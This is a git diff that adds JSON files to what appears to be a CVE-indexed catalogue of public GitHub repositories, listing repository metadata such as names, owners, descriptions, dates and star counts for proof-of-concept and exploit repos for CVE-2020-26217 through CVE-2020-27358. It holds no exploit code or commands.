+] \ No newline at end of file diff --git a/2020/CVE-2020-26217.json b/2020/CVE-2020-26217.json new file mode 100644 index 0000000000..75a0c7881e --- /dev/null +++ b/2020/CVE-2020-26217.json @@ -0,0 +1,99 @@ +[ + { + "id": 319567021, + "name": "CVE-2020-26217-XStream-RCE-POC", + "full_name": "novysodope\/CVE-2020-26217-XStream-RCE-POC", + "owner": { + "login": "novysodope", + "id": 45167857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45167857?v=4", + "html_url": "https:\/\/github.com\/novysodope", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/novysodope\/CVE-2020-26217-XStream-RCE-POC", + "description": "CVE-2020-26217 XStream RCE POC", + "fork": false, + "created_at": "2020-12-08T07:58:41Z", + "updated_at": "2022-06-08T03:10:21Z", + "pushed_at": "2020-12-08T08:02:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 331904602, + "name": "CVE-2020-26217", + "full_name": "Al1ex\/CVE-2020-26217", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-26217", + "description": "CVE-2020-26217 && XStream RCE", + "fork": false, + "created_at": "2021-01-22T09:56:11Z", + "updated_at": "2024-08-12T20:09:40Z", + "pushed_at": "2021-01-22T09:56:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-26217", + "rce", + "xstream" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 808796135, + "name": "XStream-1", + "full_name": "epicosy\/XStream-1", + "owner": { + "login": "epicosy", + "id": 30272775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epicosy\/XStream-1", + "description": "xstream with CVE-2020-26217", + "fork": false, + "created_at": "2024-05-31T20:52:08Z", + "updated_at": "2024-05-31T20:53:09Z", + "pushed_at": "2024-05-31T20:53:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26233.json b/2020/CVE-2020-26233.json new file mode 100644 index 0000000000..8a2a95049d --- /dev/null +++ b/2020/CVE-2020-26233.json @@ -0,0 +1,64 @@ +[ + { + "id": 495741457, + "name": "test_CVE-2020-26233", + "full_name": "whr819987540\/test_CVE-2020-26233", + "owner": { + "login": "whr819987540", + "id": 68956118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68956118?v=4", + "html_url": "https:\/\/github.com\/whr819987540", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whr819987540\/test_CVE-2020-26233", + "description": null, + "fork": false, + "created_at": "2022-05-24T08:49:01Z", + "updated_at": "2022-05-24T08:49:01Z", + "pushed_at": "2022-05-24T08:49:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 558712106, + "name": "CVE-2020-26233", + "full_name": "an1p3lg5\/CVE-2020-26233", + "owner": { + "login": "an1p3lg5", + "id": 111833210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111833210?v=4", + "html_url": "https:\/\/github.com\/an1p3lg5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/an1p3lg5\/CVE-2020-26233", + "description": null, + "fork": false, + "created_at": "2022-10-28T05:56:45Z", + "updated_at": "2022-10-28T05:56:45Z", + "pushed_at": "2022-10-28T05:56:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26243.json b/2020/CVE-2020-26243.json new file mode 100644 index 0000000000..b23aeacd59 --- /dev/null +++ b/2020/CVE-2020-26243.json @@ -0,0 +1,33 @@ +[ + { + "id": 887734850, + "name": "external_nanopb-c_AOSP10_CVE-2020-26243", + "full_name": "HimanshuS67\/external_nanopb-c_AOSP10_CVE-2020-26243", + "owner": { + "login": "HimanshuS67", + "id": 188300861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188300861?v=4", + "html_url": "https:\/\/github.com\/HimanshuS67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HimanshuS67\/external_nanopb-c_AOSP10_CVE-2020-26243", + "description": null, + "fork": false, + "created_at": "2024-11-13T07:34:37Z", + "updated_at": "2024-11-13T07:38:38Z", + "pushed_at": "2024-11-13T07:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26258.json b/2020/CVE-2020-26258.json new file mode 100644 index 0000000000..3f216e079b --- /dev/null +++ b/2020/CVE-2020-26258.json @@ -0,0 +1,37 @@ +[ + { + "id": 331887269, + "name": "CVE-2020-26258", + "full_name": "Al1ex\/CVE-2020-26258", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-26258", + "description": "CVE-2020-26258 && XStream SSRF", + "fork": false, + "created_at": "2021-01-22T08:44:24Z", + "updated_at": "2024-08-12T20:09:39Z", + "pushed_at": "2021-01-22T08:44:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-26258", + "ssrf", + "xstream" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26259.json b/2020/CVE-2020-26259.json new file mode 100644 index 0000000000..f6517771b0 --- /dev/null +++ b/2020/CVE-2020-26259.json @@ -0,0 +1,67 @@ +[ + { + "id": 321122801, + "name": "CVE-2020-26259", + "full_name": "jas502n\/CVE-2020-26259", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-26259", + "description": "CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.", + "fork": false, + "created_at": "2020-12-13T17:39:11Z", + "updated_at": "2024-11-01T02:37:57Z", + "pushed_at": "2020-12-13T19:12:34Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 331896682, + "name": "CVE-2020-26259", + "full_name": "Al1ex\/CVE-2020-26259", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-26259", + "description": "CVE-2020-26259 &&XStream Arbitrary File Delete", + "fork": false, + "created_at": "2021-01-22T09:23:28Z", + "updated_at": "2024-08-12T20:09:39Z", + "pushed_at": "2021-01-22T09:23:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-26259", + "xstream" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26413.json b/2020/CVE-2020-26413.json new file mode 100644 index 0000000000..eb6c55ee05 --- /dev/null +++ b/2020/CVE-2020-26413.json @@ -0,0 +1,33 @@ +[ + { + "id": 508960405, + "name": "GitLab-Graphql-CVE-2020-26413", + "full_name": "Kento-Sec\/GitLab-Graphql-CVE-2020-26413", + "owner": { + "login": "Kento-Sec", + "id": 53268974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53268974?v=4", + "html_url": "https:\/\/github.com\/Kento-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kento-Sec\/GitLab-Graphql-CVE-2020-26413", + "description": "GitLab-Graphql-CVE-2020-26413 POC", + "fork": false, + "created_at": "2022-06-30T06:29:28Z", + "updated_at": "2022-06-30T06:31:09Z", + "pushed_at": "2022-06-30T06:31:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26525.json b/2020/CVE-2020-26525.json new file mode 100644 index 0000000000..515b980604 --- /dev/null +++ b/2020/CVE-2020-26525.json @@ -0,0 +1,33 @@ +[ + { + "id": 300532106, + "name": "SmartAsset-SQLinj-CVE-2020-26525", + "full_name": "lukaszstu\/SmartAsset-SQLinj-CVE-2020-26525", + "owner": { + "login": "lukaszstu", + "id": 70864053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70864053?v=4", + "html_url": "https:\/\/github.com\/lukaszstu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukaszstu\/SmartAsset-SQLinj-CVE-2020-26525", + "description": "Damstra Smart Asset 2020.7 has SQL injection via the API\/api\/Asset originator parameter.", + "fork": false, + "created_at": "2020-10-02T07:12:18Z", + "updated_at": "2021-10-07T00:01:20Z", + "pushed_at": "2020-10-02T07:19:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26526.json b/2020/CVE-2020-26526.json new file mode 100644 index 0000000000..a2749aec42 --- /dev/null +++ b/2020/CVE-2020-26526.json @@ -0,0 +1,33 @@ +[ + { + "id": 300532968, + "name": "SmartAsset-UE-CVE-2020-26526", + "full_name": "lukaszstu\/SmartAsset-UE-CVE-2020-26526", + "owner": { + "login": "lukaszstu", + "id": 70864053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70864053?v=4", + "html_url": "https:\/\/github.com\/lukaszstu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukaszstu\/SmartAsset-UE-CVE-2020-26526", + "description": "It is possible to enumerate valid usernames on the login page.", + "fork": false, + "created_at": "2020-10-02T07:15:52Z", + "updated_at": "2020-10-02T07:18:50Z", + "pushed_at": "2020-10-02T07:18:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26527.json b/2020/CVE-2020-26527.json new file mode 100644 index 0000000000..3ead6db9b1 --- /dev/null +++ b/2020/CVE-2020-26527.json @@ -0,0 +1,33 @@ +[ + { + "id": 300534131, + "name": "SmartAsset-CORS-CVE-2020-26527", + "full_name": "lukaszstu\/SmartAsset-CORS-CVE-2020-26527", + "owner": { + "login": "lukaszstu", + "id": 70864053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70864053?v=4", + "html_url": "https:\/\/github.com\/lukaszstu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukaszstu\/SmartAsset-CORS-CVE-2020-26527", + "description": null, + "fork": false, + "created_at": "2020-10-02T07:20:38Z", + "updated_at": "2020-10-02T09:13:48Z", + "pushed_at": "2020-10-02T09:13:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2655.json b/2020/CVE-2020-2655.json new file mode 100644 index 0000000000..347f2f7637 --- /dev/null +++ b/2020/CVE-2020-2655.json @@ -0,0 +1,33 @@ +[ + { + "id": 233879183, + "name": "CVE-2020-2655-DemoServer", + "full_name": "RUB-NDS\/CVE-2020-2655-DemoServer", + "owner": { + "login": "RUB-NDS", + "id": 11559003, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11559003?v=4", + "html_url": "https:\/\/github.com\/RUB-NDS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RUB-NDS\/CVE-2020-2655-DemoServer", + "description": null, + "fork": false, + "created_at": "2020-01-14T15:59:48Z", + "updated_at": "2024-08-12T19:56:37Z", + "pushed_at": "2020-01-20T10:45:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26732.json b/2020/CVE-2020-26732.json new file mode 100644 index 0000000000..c958caddb0 --- /dev/null +++ b/2020/CVE-2020-26732.json @@ -0,0 +1,33 @@ +[ + { + "id": 598662971, + "name": "CVE-2020-26732", + "full_name": "swzhouu\/CVE-2020-26732", + "owner": { + "login": "swzhouu", + "id": 74352439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74352439?v=4", + "html_url": "https:\/\/github.com\/swzhouu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swzhouu\/CVE-2020-26732", + "description": "SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 does not set the Secure flag for the session cookie in an HTTPS session", + "fork": false, + "created_at": "2023-02-07T15:10:21Z", + "updated_at": "2023-02-07T15:11:07Z", + "pushed_at": "2023-02-07T15:10:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26733.json b/2020/CVE-2020-26733.json new file mode 100644 index 0000000000..b4427e943c --- /dev/null +++ b/2020/CVE-2020-26733.json @@ -0,0 +1,33 @@ +[ + { + "id": 598663438, + "name": "CVE-2020-26733", + "full_name": "swzhouu\/CVE-2020-26733", + "owner": { + "login": "swzhouu", + "id": 74352439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74352439?v=4", + "html_url": "https:\/\/github.com\/swzhouu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swzhouu\/CVE-2020-26733", + "description": "SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Cross Site Scripting (XSS) Vulnerability", + "fork": false, + "created_at": "2023-02-07T15:11:27Z", + "updated_at": "2023-02-07T15:12:09Z", + "pushed_at": "2023-02-07T15:11:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-26878.json b/2020/CVE-2020-26878.json new file mode 100644 index 0000000000..290fe4c84f --- /dev/null +++ b/2020/CVE-2020-26878.json @@ -0,0 +1,33 @@ +[ + { + "id": 547762035, + "name": "CVE-2020-26878", + "full_name": "htarsoo\/CVE-2020-26878", + "owner": { + "login": "htarsoo", + "id": 70771759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70771759?v=4", + "html_url": "https:\/\/github.com\/htarsoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/htarsoo\/CVE-2020-26878", + "description": null, + "fork": false, + "created_at": "2022-10-08T08:38:00Z", + "updated_at": "2022-10-08T08:47:55Z", + "pushed_at": "2022-10-08T08:47:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27190.json b/2020/CVE-2020-27190.json new file mode 100644 index 0000000000..d77a43beb7 --- /dev/null +++ b/2020/CVE-2020-27190.json @@ -0,0 +1,33 @@ +[ + { + "id": 321257850, + "name": "x-CVE-2020-27190", + "full_name": "qlh831\/x-CVE-2020-27190", + "owner": { + "login": "qlh831", + "id": 73090087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73090087?v=4", + "html_url": "https:\/\/github.com\/qlh831", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qlh831\/x-CVE-2020-27190", + "description": null, + "fork": false, + "created_at": "2020-12-14T06:44:37Z", + "updated_at": "2020-12-14T06:44:57Z", + "pushed_at": "2020-12-14T06:44:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27194.json b/2020/CVE-2020-27194.json new file mode 100644 index 0000000000..f66a488833 --- /dev/null +++ b/2020/CVE-2020-27194.json @@ -0,0 +1,64 @@ +[ + { + "id": 309990198, + "name": "CVE-2020-27194-exp", + "full_name": "willinin\/CVE-2020-27194-exp", + "owner": { + "login": "willinin", + "id": 13467761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13467761?v=4", + "html_url": "https:\/\/github.com\/willinin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/willinin\/CVE-2020-27194-exp", + "description": null, + "fork": false, + "created_at": "2020-11-04T12:02:34Z", + "updated_at": "2020-11-13T12:46:18Z", + "pushed_at": "2020-11-04T13:10:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 311324023, + "name": "CVE-2020-27194", + "full_name": "xmzyshypnc\/CVE-2020-27194", + "owner": { + "login": "xmzyshypnc", + "id": 21278314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21278314?v=4", + "html_url": "https:\/\/github.com\/xmzyshypnc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xmzyshypnc\/CVE-2020-27194", + "description": "my exp for CVE-2020-27194, tested on linux kernel 5.8.14.", + "fork": false, + "created_at": "2020-11-09T11:58:34Z", + "updated_at": "2024-01-16T16:22:23Z", + "pushed_at": "2021-02-03T04:57:56Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27199.json b/2020/CVE-2020-27199.json new file mode 100644 index 0000000000..249b819c5c --- /dev/null +++ b/2020/CVE-2020-27199.json @@ -0,0 +1,33 @@ +[ + { + "id": 277430833, + "name": "CVE-2020-27199", + "full_name": "9lyph\/CVE-2020-27199", + "owner": { + "login": "9lyph", + "id": 44860700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4", + "html_url": "https:\/\/github.com\/9lyph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9lyph\/CVE-2020-27199", + "description": "CVE-2020-27199", + "fork": false, + "created_at": "2020-07-06T03:10:34Z", + "updated_at": "2024-10-03T12:01:28Z", + "pushed_at": "2024-10-03T12:01:24Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27223.json b/2020/CVE-2020-27223.json new file mode 100644 index 0000000000..6daa76dd67 --- /dev/null +++ b/2020/CVE-2020-27223.json @@ -0,0 +1,126 @@ +[ + { + "id": 349293150, + "name": "CVE-2020-27223", + "full_name": "motikan2010\/CVE-2020-27223", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2020-27223", + "description": "CVE-2020-27223 Vulnerability App & PoC", + "fork": false, + "created_at": "2021-03-19T03:50:45Z", + "updated_at": "2024-06-26T12:07:11Z", + "pushed_at": "2021-03-19T17:55:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 397512022, + "name": "Jetty-CVE-2020-27223", + "full_name": "ttestoo\/Jetty-CVE-2020-27223", + "owner": { + "login": "ttestoo", + "id": 26863498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26863498?v=4", + "html_url": "https:\/\/github.com\/ttestoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ttestoo\/Jetty-CVE-2020-27223", + "description": null, + "fork": false, + "created_at": "2021-08-18T07:28:55Z", + "updated_at": "2021-08-18T08:59:32Z", + "pushed_at": "2021-08-18T08:59:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719426863, + "name": "Jetty_v9.4.31_CVE-2020-27223_beforepatch", + "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2020-27223_beforepatch", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2020-27223_beforepatch", + "description": null, + "fork": false, + "created_at": "2023-11-16T06:20:35Z", + "updated_at": "2023-11-16T06:25:42Z", + "pushed_at": "2023-11-16T06:25:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719429459, + "name": "Jetty_v9.4.31_CVE-2020-27223", + "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2020-27223", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2020-27223", + "description": null, + "fork": false, + "created_at": "2023-11-16T06:29:09Z", + "updated_at": "2023-11-16T06:48:43Z", + "pushed_at": "2023-11-16T07:01:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27252.json b/2020/CVE-2020-27252.json new file mode 100644 index 0000000000..cec6ee268a --- /dev/null +++ b/2020/CVE-2020-27252.json @@ -0,0 +1,33 @@ +[ + { + "id": 802252445, + "name": "GatorMed", + "full_name": "OccultSlolem\/GatorMed", + "owner": { + "login": "OccultSlolem", + "id": 10332740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10332740?v=4", + "html_url": "https:\/\/github.com\/OccultSlolem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OccultSlolem\/GatorMed", + "description": "A simulation of CVE-2020-27252 for CSC699.", + "fork": false, + "created_at": "2024-05-17T20:35:56Z", + "updated_at": "2024-05-17T21:18:30Z", + "pushed_at": "2024-09-24T01:04:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27301.json b/2020/CVE-2020-27301.json new file mode 100644 index 0000000000..793e797d92 --- /dev/null +++ b/2020/CVE-2020-27301.json @@ -0,0 +1,33 @@ +[ + { + "id": 486463960, + "name": "CVE-2020-27301-hostapd", + "full_name": "chertoGUN\/CVE-2020-27301-hostapd", + "owner": { + "login": "chertoGUN", + "id": 59345544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59345544?v=4", + "html_url": "https:\/\/github.com\/chertoGUN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chertoGUN\/CVE-2020-27301-hostapd", + "description": null, + "fork": false, + "created_at": "2022-04-28T05:53:42Z", + "updated_at": "2022-04-19T19:14:52Z", + "pushed_at": "2022-04-23T16:43:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2733.json b/2020/CVE-2020-2733.json new file mode 100644 index 0000000000..0f1606dff7 --- /dev/null +++ b/2020/CVE-2020-2733.json @@ -0,0 +1,33 @@ +[ + { + "id": 844390963, + "name": "CVE-2020-2733", + "full_name": "anmolksachan\/CVE-2020-2733", + "owner": { + "login": "anmolksachan", + "id": 60771253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60771253?v=4", + "html_url": "https:\/\/github.com\/anmolksachan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anmolksachan\/CVE-2020-2733", + "description": null, + "fork": false, + "created_at": "2024-08-19T06:54:29Z", + "updated_at": "2024-08-20T06:13:53Z", + "pushed_at": "2024-08-20T06:13:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-27358.json b/2020/CVE-2020-27358.json new file mode 100644 index 0000000000..4f52af5141 --- /dev/null +++ b/2020/CVE-2020-27358.json @@ -0,0 +1,38 @@ +[ + { + "id": 309261991, + "name": "cve-2020-27358-27359", + "full_name": "sebastian-mora\/cve-2020-27358-27359", + "owner": { + "login": "sebastian-mora", + "id": 24581748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24581748?v=4", + "html_url": "https:\/\/github.com\/sebastian-mora", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sebastian-mora\/cve-2020-27358-27359", + "description": "CVE-2020-27358 and CVE-2020-27359", + "fork": false, + "created_at": "2020-11-02T04:54:52Z", + "updated_at": "2024-08-12T20:07:17Z", + "pushed_at": "2020-11-02T05:10:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-27358", + "cve-2020-27359", + "exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] 